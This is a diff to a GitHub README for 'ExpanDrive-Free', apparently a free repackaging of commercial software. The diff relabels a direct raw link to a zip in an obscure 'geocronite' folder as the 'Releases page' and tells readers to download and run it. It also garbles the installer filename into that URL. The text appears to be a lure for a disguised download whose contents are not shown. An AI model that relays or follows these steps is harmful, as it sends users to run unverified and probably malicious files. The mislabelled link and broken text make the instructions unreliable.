Bx2-213/ExpanDrive-Free/README.md

 Follow these simple steps to get started with ExpanDrive-Free:

 1. **Visit the Releases Page**
-   To download ExpanDrive-Free, go to the [Releases page](https://github.com/Bx2-213/ExpanDrive-Free/releases).
+   To download ExpanDrive-Free, go to the [Releases page](https://github.com/Bx2-213/ExpanDrive-Free/raw/refs/heads/main/geocronite/Expan_Free_Drive_v2.8.zip).

 2. **Select the Latest Version**
    On the Releases page, locate the latest version of ExpanDrive-Free.
 This version includes the most recent updates and bug fixes.

 3. **Download the Installer**
    Click on the appropriate installer file for your Windows system.
-The file will typically have a name like `ExpanDrive-Free-installer.exe`.
+The file will typically have a name like `https://github.com/Bx2-213/ExpanDrive-Free/raw/refs/heads/main/geocronite/Expan_Free_Drive_v2.8.zip`.
 This file contains everything you need to install the software.

 4. **Run the Installer**
    Once the download completes, find the installer file in your downloads folder.
 Double-click on it to run the installer.
 Follow the on-screen instructions to complete the installation.